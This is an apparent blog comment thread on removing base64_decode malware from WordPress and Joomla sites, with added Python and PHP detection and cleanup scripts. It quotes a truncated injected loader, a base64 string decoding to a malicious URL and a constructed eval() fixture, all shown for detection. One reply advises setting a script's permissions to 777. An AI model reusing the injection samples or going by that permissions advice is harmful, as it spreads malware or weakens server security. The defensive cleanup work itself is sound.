Since you're using Bluehost, SSH is not enabled by default.
To enable SSH access you can go here:
https://my.bluehost.com/cgi/help/180
To connect to your server go here:
https://my.bluehost.com/cgi/help/301
Let me know if you have questions.
Thanks.
Thank you for this code. I've cleaned a complete Joomla installation. It was the second time that the malware infected all the PHP files.
Best Regards from Germany
Peter
Thank you Peter.
I'm glad that the script helped you clean your site again.
Please do change your FTP and WP passwords and secure a backup of your clean files and DB.
Have a great day!
Paolo
Thanks Pablo for your help! I was able to set up SSH for my account so I'm ready for action. I hope I never have to use it. But while I was at it I started using SFTP via the Transmit FTP app and the performance is so much faster than using regular FTP. SFTP uses a secure port so it doesn't have to negotiate a port number each time there is a request. Also with SFTP I'm now able to change directory and file permissions… I couldn't do that using plain old FTP.
Thanks!
John
Wow, that's really helpful information, John. Thanks for sharing it.
SFTP is really a secure one. Thanks again John. Have a great day!
Pingback: Automated Fix for WordPress base64_decode Injection in PHP Files « Blog de xkortazar
Hi, my site has been infected with the code below. This code is inserted in 30 or 40 PHP and HTML files. I have to remove it every 2 or 3 days and it constantly reappears. I ran your Cleaner and presently I don't have any infected files but I know they will keep coming.
I have changed my WordPress and FTP passwords.
Many thanks for your help,
Eric
The code:
#d93065#
echo(gzinflate(base64_decode("tVVNc9owEP0r………………aTx2nE4Mvo1VdZHr5G2d339mL9Cw==")));
#/d93065#
You have to find the culprit… the files that are generating the malware code. Compare with a healthy WordPress site by downloading the latest WP version and comparing all the files and folders/directories. Usually the malware will add extra files/folders inside the wp-content directory. The naming will look like it belongs, but once you compare sites you'll see what doesn't match. Also check all the index.php and .htaccess files for code that doesn't belong… I found a .htaccess file in my root directory that was generating malware. Also change the file permissions to 444 on .htaccess and index.php files.
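Comparing the live tree against a pristine download of the same release is the most reliable of the steps in the comment above, because obfuscation patterns change from week to week but a file's hash against the release does not. As an added example that is not part of the original post or of the cleaner, here is a Python script that hashes both trees and reports three things: files present in both but modified (injected code), files only in the site (dropped files such as the https.php in wp-includes that comes up later in this thread, or an .htaccess that a fresh WordPress zip does not ship), and files missing from the site. The demo() function builds a small constructed pair of trees in a temporary directory, with a constructed eval() injection and a constructed dropped file, so it runs offline; the paths and contents are illustrative, not real WordPress files or real malware.

```python
"""Diff a live site tree against a pristine copy of the same CMS release."""
import hashlib
import os
import tempfile

# Subtrees that always differ from a pristine download (user content, VCS
# metadata). Pruned here so the report is signal; review them separately.
SKIP_DIRS = ("wp-content/uploads", ".git")


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def file_hashes(root):
    """Map 'relative/posix/path' -> sha256 for every regular file under root."""
    hashes = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        rel_dir = "" if rel_dir == "." else rel_dir
        if any(rel_dir == s or rel_dir.startswith(s + "/") for s in SKIP_DIRS):
            dirnames[:] = []  # do not descend into the pruned subtree
            continue
        for name in sorted(filenames):
            rel = f"{rel_dir}/{name}" if rel_dir else name
            hashes[rel] = sha256_of(os.path.join(dirpath, name))
    return hashes


def compare_trees(clean_root, site_root):
    """Return {'modified': [...], 'extra': [...], 'missing': [...]}:
    modified = same path, different content (injected code);
    extra    = only in the live site (dropped files, .htaccess, backdoors);
    missing  = in the pristine release but absent from the site."""
    clean, site = file_hashes(clean_root), file_hashes(site_root)
    return {
        "modified": sorted(p for p in clean.keys() & site.keys() if clean[p] != site[p]),
        "extra": sorted(site.keys() - clean.keys()),
        "missing": sorted(clean.keys() - site.keys()),
    }


def _write(path, body):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(body)


def demo():
    """Constructed fixture: a tiny 'release' copied into a 'site', after which
    the site gets an eval() injection, a dropped wp-includes/https.php and a
    user upload. None of this is real WordPress content or real malware."""
    release = {
        "index.php": "<?php require 'wp-blog-header.php';",
        "wp-includes/version.php": "<?php $wp_version = '3.3.1';",
        "wp-content/themes/twentyeleven/header.php": "<!DOCTYPE html>",
    }
    with tempfile.TemporaryDirectory() as tmp:
        clean, site = os.path.join(tmp, "clean"), os.path.join(tmp, "site")
        for root in (clean, site):
            for rel, body in release.items():
                _write(os.path.join(root, *rel.split("/")), body)
        # constructed infection: injected loader, dropped file, legit upload
        _write(os.path.join(site, "index.php"),
               "<?php eval(base64_decode('...')); require 'wp-blog-header.php';")
        _write(os.path.join(site, "wp-includes", "https.php"), "<?php /* dropped */")
        _write(os.path.join(site, "wp-content", "uploads", "2012", "img.jpg"), "jpeg")
        return compare_trees(clean, site)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Point compare_trees() at a real pair (the unpacked release zip against public_html) and read every path listed as modified or extra; themes and plugins need their own pristine copies of the matching version. wp-content/uploads is pruned because it always differs, so check it separately for anything with a .php extension, which has no business being there.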
Hi,
The same code keeps coming, but now it's every day and only in my index.html in the root.
I checked the folders with UltraCompare and did not find any extra files except for all the plug-ins. There are a lot of files which are not like the original but I don't know what to look for.
This is my .htaccess file in the root. I don't know if there's any malicious code.
# For security reasons, Option all cannot be overridden.
#Options All -Indexes
Options ExecCGI Includes IncludesNOEXEC SymLinksIfOwnerMatch -Indexes
AddType text/cache-manifest .manifest
AddType video/ogg .ogv
AddType video/mp4 .mp4
AddType video/webm .webm
SetEnvIfNoCase Request_URI \.(og[gav]|mp4|m4a|webm)$ no-gzip dont-vary
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
Many thanks for help,
Eric
Hello Eric,
Can you please run the Malware Scanner and send the result to me at info@php-beginners.com
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
Let me know. Thanks.
Thank you !!
Thank you, I’ll try that.
Pingback: WordPress Hack : Malware Scanner | Komputer, Internet, Software Tips
I copied the script to my server. Here’s the link http://Pulkit.me/scanner.php (or cleaner.php)
It however, keeps on running. What should I do?
Hi Pulkit,
Just wait for the script to finish cleaning your files.
Paolo
I did. I get a 404 error after waiting for 5-7 minutes.
Pablo please! Help!
Hello Pulkit, Yeah! sure what can I help?
Every time I run the scripts I wait for them to finish. After 10-15 minutes of waiting I get a 404 error on both of them.
The malware makes an https.php file in the wp-includes directory. I can't find how it makes it. Do you have any idea? Can I send you all the files or give you access to my FTP? Please?
I'm not really sure why it throws an error. Can you use the CLI version? Do you know how to use SSH?
Does your hosting allow SSH?
Let me know.
I don’t know how to use SSH. But my server does allow it. Please help!
Hi Pulkit,
I created a post for you – “How to login using SSH in PuTTY”.
http://www.php-beginners.com/how-to-login-to-your-server-using-ssh-in-putty.html
I SSHed in and got the following error:
[gaborone]$ time php cleaner.php 2>&1 >> cleaner_log
Could not open input file: cleaner.php
real 0m0.040s
user 0m0.028s
sys 0m0.008s
You must be in the correct the directory where your cleaner-cli_2.7.php or cleaner.php (if rename the file to cleaner.php) file exists.
I ran the scanner from CLI and got this, but got no log file. What to do now?
[gaborone]$ time php scanner_2.4.php 2>&1 >> scanner_log | tail -f scanner_log
^C
real 7m47.685s
user 0m0.044s
sys 0m0.028s
You must be in the correct directory, the one where your scanner_2.4.php file exists.
Both the files are in the same directory (root) and yet one is getting recognized while the other can’t be found.
Hmmm... please double-check the files.
I assure you that I have. Would you like to check yourself? Please?
Yeah! Sure! Hmm, add me on Skype: oo70vd
Thanks for your work and for sharing it, Paolo. Does this script work too for malware that seems to use some kind of fake “botanalitics” in WordPress installations? It injects php files with code that includes:
base64_decode( ‘aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==’)
which decodes to http://botstatisticupdate.com/stat/stat.php
As I say, I think I’ve deleted all of the infected portions since they were on files changed on the very same date and time, so I think I could locate them all, but I am not sure what was the security flaw yet so I’m afraid it might reproduce itself… and a script for automatic elimination in the meantime might come in handy.
I came across the
base64_decode(‘aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==’)
intrusion as well. In my case they got in via FTP. I sometimes use NetDrive for FTPing. I look after a bunch of VPSs and shared web accounts. But only the accounts I had set up in NetDrive were compromised. The other VPSs and shared web accounts were not touched, but all the ones I had set up login details for in NetDrive were.
They must have got a sniffer on my local PC.
I had to add a new regex to the cleaner-cli script to pick out this attack:
$aPattern = array(
""
);
I’m sure there is a much better regex string, but this did the trick for me.
The injected code I was trying to match and remove:
And thanks Paolo. My servers are clean again thanks to you.
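The base64_decode() URL injection and the pattern-array approach from the two comments above, as an added PHP example that is not the cleaner-cli code from this post: it decodes every base64_decode() literal it finds and strips only the statements whose payload is a URL, leaving legitimate base64 use alone. The infected file content is constructed for the demonstration.

```php
<?php
// Added example, not the cleaner-cli code from the post: find base64_decode()
// calls whose payload decodes to a URL (the "botstatisticupdate" injection
// described above) and strip only those statements. Sample input is constructed.

// Returns one entry per suspicious call: literal, decoded URL and line number.
function find_base64_url_injections(string $source): array
{
    $hits = [];
    $re = '/base64_decode\s*\(\s*([\'"])([A-Za-z0-9+\/]+={0,2})\1\s*\)/';
    preg_match_all($re, $source, $m, PREG_OFFSET_CAPTURE);
    foreach ($m[2] as [$literal, $offset]) {
        $decoded = base64_decode($literal, true);        // strict: reject junk
        if ($decoded !== false && preg_match('#^https?://#i', $decoded)) {
            $hits[] = [
                'literal' => $literal,
                'decoded' => $decoded,
                'line'    => substr_count(substr($source, 0, $offset), "\n") + 1,
            ];
        }
    }
    return $hits;
}

// Removes `eval(base64_decode('...'));` and `$var = base64_decode('...');`
// statements for the literals reported above; other base64_decode() calls stay.
function strip_base64_url_injections(string $source): string
{
    foreach (find_base64_url_injections($source) as $hit) {
        $lit = preg_quote($hit['literal'], '/');
        $re  = '/(?:\$\w+\s*=\s*|eval\s*\(\s*)base64_decode\s*\(\s*[\'"]' . $lit
             . '[\'"]\s*\)\s*\)?\s*;[ \t]*\n?/';
        $source = preg_replace($re, '', $source);
    }
    return $source;
}

// Constructed infected file: one injected line plus a harmless base64 use.
$infected = "<?php\n"
    . "\$stat = base64_decode('aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==');\n"
    . "\$logo = base64_decode('aGVsbG8=');   // legitimate, not a URL\n"
    . "echo 'site';\n";

foreach (find_base64_url_injections($infected) as $hit) {
    printf("line %d: %s\n", $hit['line'], $hit['decoded']);
}
echo strip_base64_url_injections($infected);
```

Run it with `php` from the CLI; it reports the injected line with its decoded URL, then prints the file with only that statement removed. Back up the files before pointing a routine like this at a real installation.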
Paolo,
The code snips in my second reply got stripped out. Not sure if I did something wrong, I used code tags.
If you want them to help you add this malware to your script, then email me and I’ll send them directly to you.
Just email it to me at info@php-beginners.com
How long does the script take to run? And how do I know if it has worked? I’m fairly new at this, but have several sites that got hacked and are taking my visitors to porn.
Thanks!
Wew, it takes Ryan 10-20 min on a typical WordPress installation.
If you have lots of php files that would really take time.
Are you using CLI version? Let me know.
Thanks for your cleaner.. really appreciate your work..
what can be reg exp for this:
You’re welcome. What do you mean “reg exp for this:”?
I tried to paste the malware code but it’s not being saved. I saw you are using an array for the patterns to find. I have a few issues here, and I need the regex for that pattern.
I see, can you please send me 3 sample infected files. I’ll check the malware signature and create a pattern.
Please send it to info@php-beginners.com
Let me know. Thanks.
Great work Paolo. I am very grateful to you. Thanks a lot.
Great post Paolo, very useful to clean up my blogs. Thank you so much.
Awesome thanks.
Paolo,
I have been attacked by the base64_decode hack and read through this blog and was going to try this route. So the first thing I did was upload your cleaner and scanner files to my server root directory. Next opened puTTy. I copied your code for the scanner in the command line and get the following result.
tail: cannot open `scanner_log’ for reading: No such file or directory
tail: no files remaining
This is my first time using shell access, so thanks for any suggestions…
Doc
I spoke with Bluehost and was able to fix the problem. I had to change directory to public_html and now it is running. I know this was asked before as to time, and read that 10-20 minutes for a typical WP installation. I have 4 domains hosted on my site, with a lot of php files. So how long should I give it to run before you would consider it too long? I was running it before and it stopped and said terminated. I was attributing (right or wrong) this to the fact that I had copied a file from one location to the other on the server while it was running. So I started it again. How long should I let it run … 1 hr, 12 hrs, more?
Thanks,
Doc
A typical WordPress installation would normally take up to 10-15 mins. The more php files you have, the longer the script runs.
Just in case, I was hacked on Bluehost + WordPress too (on April 30th). Bluehost denies all responsibility and I believe them, but I haven’t found the original vulnerability in WordPress/plugins yet. I don’t know if your problem was the same as mine (see above). Maybe it would help to find a pattern (hosting provider, CMS, plugins…).
Speaking of everything, since I never got an answer to my question from Paolo (I wanted to know whether his script scans also for the specific infection I found or not), I ended up signing up for a paid premium service that scanned my site for malware, MySQL injections, etc., and according to them, there were no more vulnerabilities or additional backdoors… and even though I haven’t changed/updated anything (everything was already updated in the first place) I haven’t been hacked again, so I’m really at a loss about what happened ???
Hello Carlos,
Hackers nowadays are really pretty clever:
1. They log in to your server using vulnerability scripts.
2. If you log in to your server using FTP from an infected computer, they can get in as well.
3. Brute force attack.
4. The hosting/shared server is infected.
5. Phishing attack.
6. XSS attack.
7. And a lot more…
I’m not really sure how they got in to your server. The only advice I can
give to you now is:
1. Create a strong password for both your FTP and WordPress accounts.
2. Update your software.
3. If you think your computer is infected, please do clean it up.
4. Create a clean backup, because we don’t know when they are
going to attack again.
We cannot stop the attack because they’re creating and improving
their ways to hack; the only thing we can do for now is to prepare
ourselves for when that day happens.
You can test my malware scanner:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download
It scans most malware signatures that I know, but if you think that my scanner
cannot detect the malware that’s in your site, please don’t hesitate to send it
to me at info@php-beginners.com and I’ll create a way to detect it.
I hope that helps.
Have a great day!
Oh, thanks for your answer Paolo. Yes, I thought of everything you say, but it’s good to check that list again… In fact I think I’m going to make my password even stronger (I already changed it, but I’m going to change it again to a more complex one).
I don’t think I had a virus on my desktop but yes, just in case, I even re-formatted my PC and reinstalled Windows, and of course changed my password. I’ve updated my antivirus to a full internet security suite (Norton) just in case. I’ve stopped logging in to my control panel from my smartphone just in case the password was stolen through it. I have done all kinds of paranoid things but haven’t been able to find anything out of the ordinary.
Of course I might be wrong but I think I have ruled out all the possible causes, and if I had to bet, my money would be on some insecure script/plugin on my WP installation. Also, it has to be something easily “scanned”, since I think I was attacked just because I was detected as vulnerable.
Anyway. I’m sending you my old infected index.php file just in case. Maybe your script already detects it, I couldn’t really check because I had already removed it from the server when I uploaded your scanner, and I don’t want to put the file on the server again just to run the test, to minimise risks.
Again thanks a lot for your time answering my question and again thanks for sharing your work and expertise.
I ran the .php file but I’m not really sure what I’m looking at. Could you take a look at the returned results and tell me what the next step is. I thought it would remove the code from the infected files but I’m not sure I’m using it right. http://vtm-dlp.com/wordpress/cleaner_2.8.php
Thanks
Hello Norm,
I ran the cleaner on your site and it has a warning:
————————————————————
Warning: fopen(./wp-mail.php) [function.fopen]: failed to open stream: Permission denied in /home/content/n/o/r/normsfields/html/VTM/wordpress/cleaner_2.8.php on line 206
————————————————————
Can you change the cleaner permission to 777 and run the cleaner again?
Let me know. Thank you.
Appears to have worked on my Joomla site as well! Many thanks!
CH
Let me first say “thanks” and “congrats” on a great piece of software.
After I ran it, when I attempt to go to saac-arts.org from Google.com, it returns me to Google.com, with Russian links at the top, and “An unknown error” in the Search Bar.
I have also run it on “HealthWorksFitnessCenter.com” with the same results.
Thanks,
CH
Now, after running cleaner_2.8 on HealthWorksFitnessCenter.com it redirects to the regular Google.com site.
Hmm... Can you run the malware scanner for me?
http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download
and send the result to me at info@php-beginners.com
Thanks.
Hi,
I’m getting a 500 and 404 error using html scanner on Dreamhost. I do not have shell access.
Anything I may try?
Thank you!
Aaron
“500 Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@ and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”
Hello Aaron,
I apologize for the late reply.
You can activate your SSH access here:
http://wiki.dreamhost.com/Enabling_Shell_Access
Dreamhost allows you to use SSH.
Let me know.
Regards,
Paolo
Hi,
I think the program worked... it’s created a cleaner log file... but how do you know when it’s finished running? And do I need to do anything with the cleaner log file? Are the viruses still there or did it clean them permanently?
Thanks again
Hi Paolo,
Been here once already and made a donation. I’ve recently run your cleaner script again (unlucky me!).
Anyway, this is just a short note to say THANK YOU for keeping the script up to date. I’m sure you’re helping dozens of people in trouble like me.
Yes, thank you for your donation before, Victoria. I’m always updating the script.
Well, I’ll just keep you posted. Hope you’ll not be attacked again.
I checked your site and it’s really a very good looking site and unique.
Thanks again.
Hi Paolo,
I seem to have picked up a nasty script which has been added to every .php file in my hosting account. It has appended this at the top of each index.php file:
“”; echo “”;
Do you think you could send me an e-mail if you are able to create me a script which can clean this up? I will make a donation of course!
Thanks,
Greg
No worries, just send me 3 infected files to info@php-beginners.com
Hello Dear Admin, I am getting a base64 code virus in all my php files, and all the js and dev.js files have [x73/63/…. (something like that) at the end of every js file. Please do let me know any way through which I can delete these two codes from all my WordPress files.
Thanks
Please email me the tip as well as any script for this.
Hello Faheem,
Did you try to run the malware cleaner?
http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html#id-download
Please do backup your files before you run the cleaner.
Let me know.
I have been infected by malware on all of my sites. I’ve tried installing the cleaner_2.9.php on my server and it redirects to another link or nothing happens. What am I doing wrong?
Hmmm... can you check your .htaccess? Maybe that’s the reason why it redirects.
Paolo
Ok fixed that. Now when I run the cleaner, I can’t tell if it’s working or not. Is it just a blank screen for 10-15 mins?
Just wait until the script finishes loading... Let me know.
Hello Paolo,
New to this.
I put the .php on the root and it keeps saying... “waiting for ibertrainz.eu” ?????
What Am I doing wrong?
Thank you,
Alberte
Hope that the disinfection lasts. Thank you very much for your tool.
Alberte